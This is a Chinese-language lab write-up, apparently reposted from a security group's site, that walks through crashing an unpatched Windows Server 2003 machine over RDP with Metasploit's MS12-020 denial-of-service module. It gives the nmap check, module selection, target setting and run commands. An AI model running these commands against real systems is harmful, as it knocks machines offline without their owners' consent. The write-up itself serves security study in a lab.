Loading
0

windows远程桌面 MS12-020漏洞的利用 [死亡蓝屏]

漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)


介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。


实验环境:

        攻击机(kali 2021):IP地址 192.168.5.111

        目标机(windows server 2003):IP地址 192.168.5.152


实验注意事项:

    目标机3389端口必须开放,攻击机与目标机必须在同一局域网下,目标机防火墙必须关闭,目标机没有安装ms12-020漏洞补丁。
    注:其实windows server 2003系统安装好后,默认是关闭windows防火墙的,3389是默认关闭的,这里大家注意一下同步环境,以免模仿出错。


实验开始:

    1.用kali自带的nmap工具查看目标机端口开放情况,确认目标windows2003电脑 3389端口已开,这样就可以利用ms12-020漏洞进行攻击了。

    2.启动msfconsole工具

    输入命令:search ms12-020  搜索查看ms12-020漏洞利用的攻击模块。

    3.搜索到ms12-020漏洞,有2个可以利用的模块。使用其中任意一个攻击模块,然后配置其参数。

        使用这个攻击模块:   use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

        查看需要配置的参数: show options

        设置需要攻击的目标ip: set rhosts 192.168.5.152

        查看参数是否配置成功,这里很明显是配置成功了:show options

    4.运行配置好的模块
        运行: run

    这里我们看到出现seems down 表示攻击成功,已经致使目标机蓝屏了。


实验结果截图:


【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.kim 或 hack@ddos.social,我们会在最短的时间内进行处理。